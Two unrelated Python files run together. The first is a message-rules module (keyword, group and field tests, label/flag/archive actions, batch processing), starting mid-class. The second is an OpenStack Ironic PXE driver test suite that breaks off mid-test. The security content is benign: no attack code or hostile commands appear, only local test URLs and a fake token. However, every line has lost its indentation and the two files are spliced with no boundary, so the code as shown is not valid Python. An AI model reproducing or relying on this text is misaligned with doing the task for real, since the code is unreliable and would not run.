ANY = (2, _("any of"))
ALL = (3, _("all of"))
def __init__(self, val, text):
self.val = val
self.text = text
@classmethod
def from_json(cls, val):
return cls[val.upper()]
def to_json(self):
return self.name.lower()
def evaluate(self, condition_callables):
# any()/all() over generators preserves the original short-circuiting.
if self == Quantifier.NONE:
return not any(c() for c in condition_callables)
elif self == Quantifier.ANY:
return any(c() for c in condition_callables)
elif self == Quantifier.ALL:
return all(c() for c in condition_callables)
def __str__(self):
return str(self.text)
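# Quantifier sketch (illustrative): evaluate() takes zero-argument callables
# so conditions are only computed until the outcome is decided:
#
#   checks = [lambda: True, lambda: False]
#   Quantifier.ANY.evaluate(checks)   # -> True
#   Quantifier.ALL.evaluate(checks)   # -> False
#   Quantifier.NONE.evaluate(checks)  # -> False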
class DeserializationContext(object):
"""
Context object passed to all test or action from_json methods
"""
def __init__(self, org):
self.org = org
class Test(object):
"""
A test which can be evaluated to true or false on a given message
"""
__metaclass__ = ABCMeta
TYPE = None
CLASS_BY_TYPE = None # lazily initialized below
@classmethod
def from_json(cls, json_obj, context):
if not cls.CLASS_BY_TYPE:
cls.CLASS_BY_TYPE = {
ContainsTest.TYPE: ContainsTest,
WordCountTest.TYPE: WordCountTest,
GroupsTest.TYPE: GroupsTest,
FieldTest.TYPE: FieldTest,
}
test_type = json_obj["type"]
test_cls = cls.CLASS_BY_TYPE.get(test_type, None)
if not test_cls: # pragma: no cover
raise ValueError("Unknown test type: %s" % test_type)
return test_cls.from_json(json_obj, context)
@abstractmethod
def to_json(self): # pragma: no cover
pass
@abstractmethod
def get_description(self): # pragma: no cover
pass
@abstractmethod
def matches(self, message):
"""
Subclasses must implement this to return a boolean.
"""
def __eq__(self, other): # pragma: no cover
return other and self.TYPE == other.TYPE
def __ne__(self, other):
return not self.__eq__(other)
class ContainsTest(Test):
"""
Test that returns whether the message text contains or doesn't contain the given keywords
"""
TYPE = "contains"
def __init__(self, keywords, quantifier):
self.keywords = [normalize(word) for word in keywords]
self.quantifier = quantifier
@classmethod
def from_json(cls, json_obj, context):
return cls(json_obj["keywords"], Quantifier.from_json(json_obj["quantifier"]))
def to_json(self):
return {"type": self.TYPE, "keywords": self.keywords, "quantifier": self.quantifier.to_json()}
def get_description(self):
quoted_keywords = ['"%s"' % w for w in self.keywords]
return "message contains %s %s" % (str(self.quantifier), ", ".join(quoted_keywords))
def matches(self, message):
text = normalize(message.text)
def keyword_check(w):
return lambda: bool(regex.search(r"\b" + w + r"\b", text, flags=regex.UNICODE | regex.V0))
checks = [keyword_check(keyword) for keyword in self.keywords]
return self.quantifier.evaluate(checks)
@classmethod
def is_valid_keyword(cls, keyword):
return KEYWORD_REGEX.match(keyword)
def __eq__(self, other):
return (
other
and self.TYPE == other.TYPE
and self.keywords == other.keywords
and self.quantifier == other.quantifier
)
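# ContainsTest sketch (the message object is illustrative; matches() only
# needs a .text attribute and normalized keywords):
#
#   test = ContainsTest(["rain", "flood"], Quantifier.ANY)
#   test.get_description()  # -> 'message contains any of "rain", "flood"'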
class WordCountTest(Test):
"""
Test that returns whether the message text contains at least the given number of words
"""
TYPE = "words"
def __init__(self, minimum):
self.minimum = minimum
@classmethod
def from_json(cls, json_obj, context):
return cls(json_obj["minimum"])
def to_json(self):
return {"type": self.TYPE, "minimum": self.minimum}
def get_description(self):
return "message has at least %d words" % self.minimum
def matches(self, message):
num_words = len(regex.findall(r"\w+", message.text, flags=regex.UNICODE | regex.V0))
return num_words >= self.minimum
def __eq__(self, other):
return other and self.TYPE == other.TYPE and self.minimum == other.minimum
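# Illustrative example: WordCountTest(2) counts \w+ tokens, so "hello world"
# yields two words and matches, while "hello" yields one and does not.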
class GroupsTest(Test):
"""
    Test that returns whether the message was sent by a contact belonging to the given groups
"""
TYPE = "groups"
def __init__(self, groups, quantifier):
self.groups = groups
self.quantifier = quantifier
@classmethod
def from_json(cls, json_obj, context):
groups = list(Group.objects.filter(org=context.org, pk__in=json_obj["groups"]).order_by("pk"))
return cls(groups, Quantifier.from_json(json_obj["quantifier"]))
def to_json(self):
return {"type": self.TYPE, "groups": [g.pk for g in self.groups], "quantifier": self.quantifier.to_json()}
def get_description(self):
group_names = [g.name for g in self.groups]
return "contact belongs to %s %s" % (str(self.quantifier), ", ".join(group_names))
def matches(self, message):
contact_groups = set(message.contact.groups.all())
def group_check(g):
return lambda: g in contact_groups
checks = [group_check(group) for group in self.groups]
return self.quantifier.evaluate(checks)
def __eq__(self, other):
return (
other and self.TYPE == other.TYPE and self.groups == other.groups and self.quantifier == other.quantifier
)
class FieldTest(Test):
"""
    Test that returns whether the message was sent by a contact with the given field value
"""
TYPE = "field"
def __init__(self, key, values):
self.key = key
self.values = [normalize(v) for v in values]
@classmethod
def from_json(cls, json_obj, context):
return cls(json_obj["key"], json_obj["values"])
def to_json(self):
return {"type": self.TYPE, "key": self.key, "values": self.values}
def get_description(self):
quoted_values = ['"%s"' % v for v in self.values]
return "contact.%s is %s %s" % (self.key, Quantifier.ANY, ", ".join(quoted_values))
def matches(self, message):
if message.contact.fields:
contact_value = normalize(message.contact.fields.get(self.key, ""))
for value in self.values:
if value == contact_value:
return True
return False
def __eq__(self, other):
return other and self.TYPE == other.TYPE and self.key == other.key and self.values == other.values
class Action(object):
"""
An action which can be performed on a message
"""
__metaclass__ = ABCMeta
TYPE = None
CLASS_BY_TYPE = None # lazily initialized below
@classmethod
def from_json(cls, json_obj, context):
if not cls.CLASS_BY_TYPE:
cls.CLASS_BY_TYPE = {
LabelAction.TYPE: LabelAction,
FlagAction.TYPE: FlagAction,
ArchiveAction.TYPE: ArchiveAction,
}
action_type = json_obj["type"]
action_cls = cls.CLASS_BY_TYPE.get(action_type)
if not action_cls: # pragma: no cover
raise ValueError("Unknown action type: %s" % action_type)
return action_cls.from_json(json_obj, context)
@abstractmethod
def to_json(self): # pragma: no cover
pass
@abstractmethod
def get_description(self): # pragma: no cover
pass
def __eq__(self, other):
return self.TYPE == other.TYPE
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(self.TYPE)
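# Illustrative JSON shapes accepted by Action.from_json, mirroring the to_json
# methods below:
#
#   {"type": "label", "label": 3}
#   {"type": "flag"}
#   {"type": "archive"}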
class LabelAction(Action):
"""
Adds a label to the message
"""
TYPE = "label"
def __init__(self, label):
self.label = label
@classmethod
def from_json(cls, json_obj, context):
return cls(Label.objects.get(org=context.org, pk=json_obj["label"]))
def to_json(self):
return {"type": self.TYPE, "label": self.label.pk}
def get_description(self):
return "apply label '%s'" % self.label.name
def apply_to(self, org, messages):
for msg in messages:
msg.label(self.label)
if self.label.is_synced:
org.get_backend().label_messages(org, messages, self.label)
def __eq__(self, other):
return self.TYPE == other.TYPE and self.label == other.label
def __hash__(self):
return hash(self.TYPE + str(self.label.pk))
class FlagAction(Action):
"""
Flags the message
"""
TYPE = "flag"
@classmethod
def from_json(cls, json_obj, context):
return cls()
def to_json(self):
return {"type": self.TYPE}
def get_description(self):
return "flag"
def apply_to(self, org, messages):
Message.objects.filter(pk__in=[m.pk for m in messages]).update(is_flagged=True)
org.get_backend().flag_messages(org, messages)
class ArchiveAction(Action):
"""
Archives the message
"""
TYPE = "archive"
@classmethod
def from_json(cls, json_obj, context):
return cls()
def to_json(self):
return {"type": self.TYPE}
def get_description(self):
return "archive"
def apply_to(self, org, messages):
Message.objects.filter(pk__in=[m.pk for m in messages]).update(is_archived=True)
org.get_backend().archive_messages(org, messages)
class Rule(models.Model):
"""
    At some point this will become a first-class object, but for now it is always attached to a label.
"""
org = models.ForeignKey(Org, verbose_name=_("Organization"), related_name="rules", on_delete=models.PROTECT)
tests = models.TextField()
actions = models.TextField()
@classmethod
def create(cls, org, tests, actions):
return cls.objects.create(org=org, tests=json_encode(tests), actions=json_encode(actions))
@classmethod
def get_all(cls, org):
return org.rules.all()
def get_tests(self):
return get_obj_cacheable(self, "_tests", lambda: self._get_tests())
def _get_tests(self):
return [Test.from_json(t, DeserializationContext(self.org)) for t in json.loads(self.tests)]
def get_tests_description(self):
return _(" and ").join([t.get_description() for t in self.get_tests()])
def get_actions(self):
return get_obj_cacheable(self, "_actions", lambda: self._get_actions())
def _get_actions(self):
return [Action.from_json(a, DeserializationContext(self.org)) for a in json.loads(self.actions)]
def get_actions_description(self):
return _(" and ").join([a.get_description() for a in self.get_actions()])
def matches(self, message):
"""
Returns whether this rule matches the given message, i.e. all of its tests match the message
"""
for test in self.get_tests():
if not test.matches(message):
return False
return True
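    # Note that tests within a rule combine conjunctively: matches() is True
    # only when every test matches. Disjunction and negation live inside an
    # individual test's Quantifier (ANY/NONE), not at the rule level.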
class BatchProcessor(object):
"""
    Applies a set of rules to a batch of messages in a way that allows identical actions
    to be merged, reducing the number of calls needed to the backend.
"""
def __init__(self, org, rules):
self.org = org
self.rules = rules
self.messages_by_action = defaultdict(set)
def include_messages(self, *messages):
"""
Includes the given messages in this batch processing
:param messages: the messages to include
:return: tuple of the number of rules matched, and the number of actions that will be performed
"""
num_rules_matched = 0
num_actions_deferred = 0
for message in messages:
for rule in self.rules:
if rule.matches(message):
num_rules_matched += 1
for action in rule.get_actions():
self.messages_by_action[action].add(message)
num_actions_deferred += 1
return num_rules_matched, num_actions_deferred
def apply_actions(self):
"""
Applies the actions gathered by this processor
"""
for action, messages in self.messages_by_action.items():
action.apply_to(self.org, messages)
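# A minimal usage sketch (illustrative; assumes `org` and `messages` are
# already loaded):
#
#   processor = BatchProcessor(org, Rule.get_all(org))
#   matched, deferred = processor.include_messages(*messages)
#   processor.apply_actions()
#
# Because messages_by_action is keyed on Action instances, and actions hash on
# TYPE (plus the label pk for LabelAction), the same action produced by
# different rules is applied once over the union of its matching messages.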
# coding=utf-8
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Test class for PXE driver."""
import os
import tempfile
import mock
from oslo_config import cfg
from oslo_serialization import jsonutils as json
from ironic.common import boot_devices
from ironic.common import dhcp_factory
from ironic.common import driver_factory
from ironic.common import exception
from ironic.common.glance_service import base_image_service
from ironic.common import keystone
from ironic.common import pxe_utils
from ironic.common import states
from ironic.common import utils
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent_base_vendor
from ironic.drivers.modules import deploy_utils
from ironic.drivers.modules import iscsi_deploy
from ironic.drivers.modules import pxe
from ironic.drivers import utils as driver_utils
from ironic.openstack.common import fileutils
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
CONF = cfg.CONF
INST_INFO_DICT = db_utils.get_test_pxe_instance_info()
DRV_INFO_DICT = db_utils.get_test_pxe_driver_info()
DRV_INTERNAL_INFO_DICT = db_utils.get_test_pxe_driver_internal_info()
class PXEValidateParametersTestCase(db_base.DbTestCase):
def test__parse_deploy_info(self):
# make sure we get back the expected things
node = obj_utils.create_test_node(
self.context,
driver='fake_pxe',
instance_info=INST_INFO_DICT,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT,
)
info = pxe._parse_deploy_info(node)
self.assertIsNotNone(info.get('deploy_ramdisk'))
self.assertIsNotNone(info.get('deploy_kernel'))
self.assertIsNotNone(info.get('image_source'))
self.assertIsNotNone(info.get('root_gb'))
self.assertEqual(0, info.get('ephemeral_gb'))
def test__parse_driver_info_missing_deploy_kernel(self):
# make sure error is raised when info is missing
info = dict(DRV_INFO_DICT)
del info['deploy_kernel']
node = obj_utils.create_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
pxe._parse_driver_info,
node)
def test__parse_driver_info_missing_deploy_ramdisk(self):
# make sure error is raised when info is missing
info = dict(DRV_INFO_DICT)
del info['deploy_ramdisk']
node = obj_utils.create_test_node(self.context, driver_info=info)
self.assertRaises(exception.MissingParameterValue,
pxe._parse_driver_info,
node)
def test__parse_driver_info_good(self):
# make sure we get back the expected things
node = obj_utils.create_test_node(self.context,
driver='fake_pxe',
driver_info=DRV_INFO_DICT)
info = pxe._parse_driver_info(node)
self.assertIsNotNone(info.get('deploy_ramdisk'))
self.assertIsNotNone(info.get('deploy_kernel'))
def test__parse_driver_info_backwards_compat(self):
old_drv_info = {}
old_drv_info['pxe_deploy_kernel'] = DRV_INFO_DICT['deploy_kernel']
old_drv_info['pxe_deploy_ramdisk'] = DRV_INFO_DICT['deploy_ramdisk']
node = obj_utils.create_test_node(self.context,
driver='fake_pxe',
driver_info=old_drv_info)
info = pxe._parse_driver_info(node)
self.assertIsNotNone(info.get('deploy_ramdisk'))
self.assertIsNotNone(info.get('deploy_kernel'))
class PXEPrivateMethodsTestCase(db_base.DbTestCase):
def setUp(self):
super(PXEPrivateMethodsTestCase, self).setUp()
n = {
'driver': 'fake_pxe',
'instance_info': INST_INFO_DICT,
'driver_info': DRV_INFO_DICT,
'driver_internal_info': DRV_INTERNAL_INFO_DICT,
}
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
self.node = obj_utils.create_test_node(self.context, **n)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def _test__get_image_info(self, show_mock):
properties = {'properties': {u'kernel_id': u'instance_kernel_uuid',
u'ramdisk_id': u'instance_ramdisk_uuid'}}
expected_info = {'ramdisk':
('instance_ramdisk_uuid',
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'ramdisk')),
'kernel':
('instance_kernel_uuid',
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'kernel')),
'deploy_ramdisk':
(DRV_INFO_DICT['deploy_ramdisk'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_ramdisk')),
'deploy_kernel':
(DRV_INFO_DICT['deploy_kernel'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_kernel'))}
show_mock.return_value = properties
image_info = pxe._get_image_info(self.node, self.context)
show_mock.assert_called_once_with('glance://image_uuid',
method='get')
self.assertEqual(expected_info, image_info)
# test with saved info
show_mock.reset_mock()
image_info = pxe._get_image_info(self.node, self.context)
self.assertEqual(expected_info, image_info)
self.assertFalse(show_mock.called)
self.assertEqual('instance_kernel_uuid',
self.node.instance_info.get('kernel'))
self.assertEqual('instance_ramdisk_uuid',
self.node.instance_info.get('ramdisk'))
def test__get_image_info(self):
# Tests when 'is_whole_disk_image' exists in driver_internal_info
self._test__get_image_info()
def test__get_image_info_without_is_whole_disk_image(self):
        # Tests when 'is_whole_disk_image' doesn't exist in
# driver_internal_info
del self.node.driver_internal_info['is_whole_disk_image']
self.node.save()
self._test__get_image_info()
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test__get_image_info_whole_disk_image(self, show_mock):
properties = {'properties': None}
expected_info = {'deploy_ramdisk':
(DRV_INFO_DICT['deploy_ramdisk'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_ramdisk')),
'deploy_kernel':
(DRV_INFO_DICT['deploy_kernel'],
os.path.join(CONF.pxe.tftp_root,
self.node.uuid,
'deploy_kernel'))}
show_mock.return_value = properties
self.node.driver_internal_info['is_whole_disk_image'] = True
image_info = pxe._get_image_info(self.node, self.context)
self.assertEqual(expected_info, image_info)
@mock.patch.object(iscsi_deploy, 'build_deploy_ramdisk_options')
@mock.patch.object(pxe_utils, '_build_pxe_config')
def _test_build_pxe_config_options(self, build_pxe_mock, deploy_opts_mock,
whle_dsk_img=False,
ipxe_enabled=False):
self.config(pxe_append_params='test_param', group='pxe')
        # NOTE: the trailing '/' should be stripped from the URL string
self.config(api_url='http://192.168.122.184:6385', group='conductor')
self.config(disk_devices='sda', group='pxe')
fake_deploy_opts = {
'iscsi_target_iqn': 'fake-iqn',
'deployment_id': 'fake-deploy-id',
'deployment_key': 'fake-deploy-key',
'disk': 'fake-disk',
'ironic_api_url': 'fake-api-url',
'boot_option': 'netboot',
'boot_mode': 'bios',
'coreos.configdrive': 0,
}
deploy_opts_mock.return_value = fake_deploy_opts
self.node.driver_internal_info['is_whole_disk_image'] = whle_dsk_img
tftp_server = CONF.pxe.tftp_server
if ipxe_enabled:
http_url = 'http://192.1.2.3:1234'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url=http_url, group='pxe')
deploy_kernel = os.path.join(http_url, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(http_url, self.node.uuid,
'deploy_ramdisk')
kernel = os.path.join(http_url, self.node.uuid, 'kernel')
ramdisk = os.path.join(http_url, self.node.uuid, 'ramdisk')
root_dir = CONF.pxe.http_root
else:
deploy_kernel = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_ramdisk')
kernel = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'kernel')
ramdisk = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'ramdisk')
root_dir = CONF.pxe.tftp_root
if whle_dsk_img:
ramdisk = 'no_ramdisk'
kernel = 'no_kernel'
expected_options = {
'ari_path': ramdisk,
'deployment_ari_path': deploy_ramdisk,
'pxe_append_params': 'test_param',
'aki_path': kernel,
'deployment_aki_path': deploy_kernel,
'tftp_server': tftp_server,
'boot_option': 'netboot',
'ipa-api-url': CONF.conductor.api_url,
'ipa-driver-name': self.node.driver,
'boot_mode': 'bios',
}
expected_options.update(fake_deploy_opts)
image_info = {'deploy_kernel': ('deploy_kernel',
os.path.join(root_dir,
self.node.uuid,
'deploy_kernel')),
'deploy_ramdisk': ('deploy_ramdisk',
os.path.join(root_dir,
self.node.uuid,
'deploy_ramdisk')),
'kernel': ('kernel_id',
os.path.join(root_dir,
self.node.uuid,
'kernel')),
'ramdisk': ('ramdisk_id',
os.path.join(root_dir,
self.node.uuid,
'ramdisk'))}
options = pxe._build_pxe_config_options(self.node,
image_info,
self.context)
self.assertEqual(expected_options, options)
def test__build_pxe_config_options(self):
self._test_build_pxe_config_options(whle_dsk_img=True,
ipxe_enabled=False)
def test__build_pxe_config_options_ipxe(self):
self._test_build_pxe_config_options(whle_dsk_img=True,
ipxe_enabled=True)
def test__build_pxe_config_options_without_is_whole_disk_image(self):
del self.node.driver_internal_info['is_whole_disk_image']
self.node.save()
self._test_build_pxe_config_options(whle_dsk_img=False,
ipxe_enabled=False)
@mock.patch.object(iscsi_deploy, 'build_deploy_ramdisk_options')
@mock.patch.object(pxe_utils, '_build_pxe_config')
def test__build_pxe_config_options_whole_disk_image(self,
build_pxe_mock,
deploy_opts_mock,
ipxe_enabled=False):
self.config(pxe_append_params='test_param', group='pxe')
        # NOTE: the trailing '/' should be stripped from the URL string
self.config(api_url='http://192.168.122.184:6385', group='conductor')
self.config(disk_devices='sda', group='pxe')
fake_deploy_opts = {'iscsi_target_iqn': 'fake-iqn',
'deployment_id': 'fake-deploy-id',
'deployment_key': 'fake-deploy-key',
'disk': 'fake-disk',
'ironic_api_url': 'fake-api-url',
'coreos.configdrive': 0}
deploy_opts_mock.return_value = fake_deploy_opts
tftp_server = CONF.pxe.tftp_server
if ipxe_enabled:
http_url = 'http://192.1.2.3:1234'
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url=http_url, group='pxe')
deploy_kernel = os.path.join(http_url, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(http_url, self.node.uuid,
'deploy_ramdisk')
root_dir = CONF.pxe.http_root
else:
deploy_kernel = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_kernel')
deploy_ramdisk = os.path.join(CONF.pxe.tftp_root, self.node.uuid,
'deploy_ramdisk')
root_dir = CONF.pxe.tftp_root
expected_options = {
'deployment_ari_path': deploy_ramdisk,
'pxe_append_params': 'test_param',
'deployment_aki_path': deploy_kernel,
'tftp_server': tftp_server,
'aki_path': 'no_kernel',
'ari_path': 'no_ramdisk',
'ipa-api-url': CONF.conductor.api_url,
'ipa-driver-name': self.node.driver,
}
expected_options.update(fake_deploy_opts)
image_info = {'deploy_kernel': ('deploy_kernel',
os.path.join(root_dir,
self.node.uuid,
'deploy_kernel')),
'deploy_ramdisk': ('deploy_ramdisk',
os.path.join(root_dir,
self.node.uuid,
'deploy_ramdisk')),
}
self.node.driver_internal_info['is_whole_disk_image'] = True
options = pxe._build_pxe_config_options(self.node,
image_info,
self.context)
self.assertEqual(expected_options, options)
def test_get_token_file_path(self):
node_uuid = self.node.uuid
self.assertEqual('/tftpboot/token-' + node_uuid,
pxe._get_token_file_path(node_uuid))
@mock.patch.object(deploy_utils, 'fetch_images')
def test__cache_tftp_images_master_path(self, mock_fetch_image):
temp_dir = tempfile.mkdtemp()
self.config(tftp_root=temp_dir, group='pxe')
self.config(tftp_master_path=os.path.join(temp_dir,
'tftp_master_path'),
group='pxe')
image_path = os.path.join(temp_dir, self.node.uuid,
'deploy_kernel')
image_info = {'deploy_kernel': ('deploy_kernel', image_path)}
fileutils.ensure_tree(CONF.pxe.tftp_master_path)
pxe._cache_ramdisk_kernel(None, self.node, image_info)
mock_fetch_image.assert_called_once_with(None,
mock.ANY,
[('deploy_kernel',
image_path)],
True)
@mock.patch.object(pxe, 'TFTPImageCache', lambda: None)
@mock.patch.object(fileutils, 'ensure_tree')
@mock.patch.object(deploy_utils, 'fetch_images')
def test__cache_ramdisk_kernel(self, mock_fetch_image, mock_ensure_tree):
self.config(ipxe_enabled=False, group='pxe')
fake_pxe_info = {'foo': 'bar'}
expected_path = os.path.join(CONF.pxe.tftp_root, self.node.uuid)
pxe._cache_ramdisk_kernel(self.context, self.node, fake_pxe_info)
mock_ensure_tree.assert_called_with(expected_path)
mock_fetch_image.assert_called_once_with(self.context, mock.ANY,
fake_pxe_info.values(), True)
@mock.patch.object(pxe, 'TFTPImageCache', lambda: None)
@mock.patch.object(fileutils, 'ensure_tree')
@mock.patch.object(deploy_utils, 'fetch_images')
def test__cache_ramdisk_kernel_ipxe(self, mock_fetch_image,
mock_ensure_tree):
self.config(ipxe_enabled=True, group='pxe')
fake_pxe_info = {'foo': 'bar'}
expected_path = os.path.join(CONF.pxe.http_root, self.node.uuid)
pxe._cache_ramdisk_kernel(self.context, self.node, fake_pxe_info)
mock_ensure_tree.assert_called_with(expected_path)
mock_fetch_image.assert_called_once_with(self.context, mock.ANY,
fake_pxe_info.values(),
True)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_exc(self, mock_log):
properties = {'capabilities': 'boot_mode:uefi'}
instance_info = {"boot_option": "netboot"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = True
self.assertRaises(exception.InvalidParameterValue,
pxe.validate_boot_option_for_uefi,
self.node)
self.assertTrue(mock_log.called)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_noexc_one(self, mock_log):
properties = {'capabilities': 'boot_mode:uefi'}
instance_info = {"boot_option": "local"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = True
pxe.validate_boot_option_for_uefi(self.node)
self.assertFalse(mock_log.called)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_noexc_two(self, mock_log):
properties = {'capabilities': 'boot_mode:bios'}
instance_info = {"boot_option": "local"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = True
pxe.validate_boot_option_for_uefi(self.node)
self.assertFalse(mock_log.called)
@mock.patch.object(pxe.LOG, 'error')
def test_validate_boot_option_for_uefi_noexc_three(self, mock_log):
properties = {'capabilities': 'boot_mode:uefi'}
instance_info = {"boot_option": "local"}
self.node.properties = properties
self.node.instance_info['capabilities'] = instance_info
self.node.driver_internal_info['is_whole_disk_image'] = False
pxe.validate_boot_option_for_uefi(self.node)
self.assertFalse(mock_log.called)
class PXEDriverTestCase(db_base.DbTestCase):
def setUp(self):
super(PXEDriverTestCase, self).setUp()
self.context.auth_token = '4562138218392831'
self.temp_dir = tempfile.mkdtemp()
self.config(tftp_root=self.temp_dir, group='pxe')
self.temp_dir = tempfile.mkdtemp()
self.config(images_path=self.temp_dir, group='pxe')
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
instance_info = INST_INFO_DICT
instance_info['deploy_key'] = 'fake-56789'
self.node = obj_utils.create_test_node(
self.context,
driver='fake_pxe',
instance_info=instance_info,
driver_info=DRV_INFO_DICT,
driver_internal_info=DRV_INTERNAL_INFO_DICT)
self.port = obj_utils.create_test_port(self.context,
node_id=self.node.id)
self.config(group='conductor', api_url='http://127.0.0.1:1234/')
def _create_token_file(self):
token_path = pxe._get_token_file_path(self.node.uuid)
open(token_path, 'w').close()
return token_path
def test_get_properties(self):
expected = pxe.COMMON_PROPERTIES
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertEqual(expected, task.driver.get_properties())
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_good(self, mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.validate(task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_good_whole_disk_image(self, mock_glance):
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.driver_internal_info['is_whole_disk_image'] = True
task.driver.deploy.validate(task)
def test_validate_fail(self):
info = dict(INST_INFO_DICT)
del info['image_source']
self.node.instance_info = json.dumps(info)
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node['instance_info'] = json.dumps(info)
self.assertRaises(exception.MissingParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_invalid_boot_mode(self, mock_glance):
properties = {'capabilities': 'boot_mode:foo,cap2:value2'}
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_invalid_config_uefi_ipxe(self, mock_glance):
properties = {'capabilities': 'boot_mode:uefi,cap2:value2'}
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
self.config(ipxe_enabled=True, group='pxe')
self.config(http_url='dummy_url', group='pxe')
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
def test_validate_fail_invalid_config_uefi_whole_disk_image(self):
properties = {'capabilities': 'boot_mode:uefi,boot_option:netboot'}
instance_info = {"boot_option": "netboot"}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
task.node.instance_info['capabilities'] = instance_info
task.node.driver_internal_info['is_whole_disk_image'] = True
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_invalid_boot_option(self, mock_glance):
properties = {'capabilities': 'boot_option:foo,dog:wuff'}
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.node.properties = properties
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
def test_validate_fail_no_port(self):
new_node = obj_utils.create_test_node(
self.context,
uuid='aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee',
driver='fake_pxe', instance_info=INST_INFO_DICT,
driver_info=DRV_INFO_DICT)
with task_manager.acquire(self.context, new_node.uuid,
shared=True) as task:
self.assertRaises(exception.MissingParameterValue,
task.driver.deploy.validate, task)
@mock.patch.object(base_image_service.BaseImageService, '_show')
@mock.patch.object(keystone, 'get_service_url')
def test_validate_good_api_url_from_config_file(self, mock_ks,
mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
# not present in the keystone catalog
mock_ks.side_effect = exception.KeystoneFailure
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.validate(task)
self.assertFalse(mock_ks.called)
@mock.patch.object(base_image_service.BaseImageService, '_show')
@mock.patch.object(keystone, 'get_service_url')
def test_validate_good_api_url_from_keystone(self, mock_ks, mock_glance):
mock_glance.return_value = {'properties': {'kernel_id': 'fake-kernel',
'ramdisk_id': 'fake-initr'}}
# present in the keystone catalog
mock_ks.return_value = 'http://127.0.0.1:1234'
# not present in the config file
self.config(group='conductor', api_url=None)
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
task.driver.deploy.validate(task)
mock_ks.assert_called_once_with()
@mock.patch.object(keystone, 'get_service_url')
def test_validate_fail_no_api_url(self, mock_ks):
# not present in the keystone catalog
mock_ks.side_effect = exception.KeystoneFailure
# not present in the config file
self.config(group='conductor', api_url=None)
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
self.assertRaises(exception.InvalidParameterValue,
task.driver.deploy.validate, task)
mock_ks.assert_called_once_with()
@mock.patch.object(base_image_service.BaseImageService, '_show')
def test_validate_fail_no_image_kernel_ramdisk_props(self, mock_glance):
mock_glance.return_value = {'properties': {}}
with task_manager.acquire(self.context, self.node.uuid,
shared=True) as task:
